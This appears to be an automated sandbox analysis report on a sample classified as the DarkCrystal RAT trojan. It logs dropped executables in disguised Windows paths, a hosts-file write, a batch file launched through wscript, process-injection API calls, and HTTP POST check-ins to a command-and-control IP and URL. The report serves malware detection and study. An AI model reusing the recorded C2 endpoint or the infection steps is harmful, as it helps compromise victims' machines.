Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb | source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000000.1628945437.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp, C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D7ECA0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D6647C
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D930F0 FindFirstFileExA,0_2_00007FF7F4D930F0
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00D5A69B
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00D6C220
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB98DCE0 FindFirstFileExW,7_2_000001B0BB98DCE0
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26FDCE0 FindFirstFileExW,9_2_00000216D26FDCE0
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93EDCE0 FindFirstFileExW,38_2_00000150E93EDCE0
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE9DCE0 FindFirstFileExW,40_2_00000267FCE9DCE0
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B52DCE0 FindFirstFileExW,45_2_000002359B52DCE0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC64DCE0 FindFirstFileExW,49_2_00000225DC64DCE0
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh8_2_00007FFD9BC4D87D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh20_2_00007FFD9BC7D87D

Networking

Source: Traffic | Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 176.123.168.151:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View | ASN Name: SPEEDYLINERU SPEEDYLINERU
Source: Joe Sandbox View | JA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
Source: global traffic | HTTP traffic detected: POST /4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 176.123.168.151 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown | HTTP traffic detected: POST /4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 176.123.168.151 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.123.168.151
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows
Source: hyperProviderSavesinto.exe, 00000008.00000002.1733479923.0000000003304000.00000004.00000800.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://176.123.168.151
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 176.123.168.151:443 -> 192.168.2.4:49738 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary

                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,38_2_00000150E93E253C
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E202C NtQuerySystemInformation,StrCmpNIW,38_2_00000150E93E202C
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E2244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,38_2_00000150E93E2244
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,46_2_00000001400010C0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,49_2_00000225DC6428C8
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D56FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00D56FAA
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exeJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\Provisioning\Packages\e3a74901549792Jump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exeJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\RemotePackages\RemoteDesktops\e3a74901549792Jump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D756640_2_00007FF7F4D75664
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D83FCC0_2_00007FF7F4D83FCC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6A8AC0_2_00007FF7F4D6A8AC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D809980_2_00007FF7F4D80998
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7625C0_2_00007FF7F4D7625C
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6DC080_2_00007FF7F4D6DC08
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7ECA00_2_00007FF7F4D7ECA0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D8BDB80_2_00007FF7F4D8BDB8
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6BF080_2_00007FF7F4D6BF08
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D92EE40_2_00007FF7F4D92EE4
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D98FC80_2_00007FF7F4D98FC8
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6E8D80_2_00007FF7F4D6E8D8
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D8C0340_2_00007FF7F4D8C034
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7C9F00_2_00007FF7F4D7C9F0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D959A00_2_00007FF7F4D959A0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6B9440_2_00007FF7F4D6B944
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D83FCC0_2_00007FF7F4D83FCC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6B3140_2_00007FF7F4D6B314
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D672AC0_2_00007FF7F4D672AC
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D8FCD80_2_00007FF7F4D8FCD8
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D954D00_2_00007FF7F4D954D0
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5848E1_2_00D5848E
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D540FE1_2_00D540FE
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D640881_2_00D64088
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D600B71_2_00D600B7
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D751C91_2_00D751C9
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D671531_2_00D67153
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D662CA1_2_00D662CA
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D532F71_2_00D532F7
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D643BF1_2_00D643BF
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D7D4401_2_00D7D440
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5F4611_2_00D5F461
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5C4261_2_00D5C426
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D677EF1_2_00D677EF
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D7D8EE1_2_00D7D8EE
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5286B1_2_00D5286B
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D819F41_2_00D819F4
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5E9B71_2_00D5E9B7
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D66CDC1_2_00D66CDC
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D63E0B1_2_00D63E0B
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5EFE21_2_00D5EFE2
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D74F9A1_2_00D74F9A
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB951F2C7_2_000001B0BB951F2C
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB95D0E07_2_000001B0BB95D0E0
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB9638A87_2_000001B0BB9638A8
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB982B2C7_2_000001B0BB982B2C
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB98DCE07_2_000001B0BB98DCE0
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB9944A87_2_000001B0BB9944A8
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BA90D7C8_2_00007FFD9BA90D7C
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC56BFB8_2_00007FFD9BC56BFB
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC553778_2_00007FFD9BC55377
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC462F38_2_00007FFD9BC462F3
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC554FA8_2_00007FFD9BC554FA
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC43CE98_2_00007FFD9BC43CE9
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC40CAF8_2_00007FFD9BC40CAF
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26C1F2C9_2_00000216D26C1F2C
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26D38A89_2_00000216D26D38A8
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26CD0E09_2_00000216D26CD0E0
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26F2B2C9_2_00000216D26F2B2C
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D27044A89_2_00000216D27044A8
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26FDCE09_2_00000216D26FDCE0
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BAC0D7C20_2_00007FFD9BAC0D7C
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BC8537720_2_00007FFD9BC85377
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BC854FA20_2_00007FFD9BC854FA
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BC73CE920_2_00007FFD9BC73CE9
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BC70CAF20_2_00007FFD9BC70CAF
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 26_2_00007FFD9BAA0D7C26_2_00007FFD9BAA0D7C
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E90538A838_2_00000150E90538A8
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E904D0E038_2_00000150E904D0E0
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E9041F2C38_2_00000150E9041F2C
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93F44A838_2_00000150E93F44A8
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93EDCE038_2_00000150E93EDCE0
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93E2B2C38_2_00000150E93E2B2C
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE61F2C40_2_00000267FCE61F2C
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE6D0E040_2_00000267FCE6D0E0
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE738A840_2_00000267FCE738A8
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE92B2C40_2_00000267FCE92B2C
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE9DCE040_2_00000267FCE9DCE0
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCEA44A840_2_00000267FCEA44A8
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B4F1F2C45_2_000002359B4F1F2C
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B4FD0E045_2_000002359B4FD0E0
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B5038A845_2_000002359B5038A8
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B53AEC245_2_000002359B53AEC2
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B522B2C45_2_000002359B522B2C
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B52DCE045_2_000002359B52DCE0
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B5344A845_2_000002359B5344A8
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B53A92245_2_000002359B53A922
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000226C46_2_000000014000226C
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400014D846_2_00000001400014D8
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000256046_2_0000000140002560
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC611F2C49_2_00000225DC611F2C
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC61D0E049_2_00000225DC61D0E0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC6238A849_2_00000225DC6238A8
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC642B2C49_2_00000225DC642B2C
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC64DCE049_2_00000225DC64DCE0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC6544A849_2_00000225DC6544A8
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\IkSFhrpY.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: String function: 00D6EB78 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: String function: 00D6F5F0 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: String function: 00D6EC50 appears 56 times
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                Source: hyperProviderSavesinto.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: KZcLqgnLvRf.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: RuntimeBroker.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: KZcLqgnLvRf.exe0.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: KZcLqgnLvRf.exe1.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: classification engineClassification label: mal100.troj.adwa.evad.winEXE@77/37@0/1
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D63BF8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF7F4D63BF8
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,46_2_000000014000226C
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,46_2_00000001400019C4
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7C220 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF7F4D7C220
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\msAjSsFc.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeMutant created: \Sessions\1\BaseNamedObjects\Local\5ca49a59652f7149b9095204d2006cefde527ed294d5ef6eecd72eab40b4b978
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7103562
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Command line argument: sfxname (1_2_00D6DF1E)
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Command line argument: sfxstime (1_2_00D6DF1E)
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Command line argument: STARTDLG (1_2_00D6DF1E)
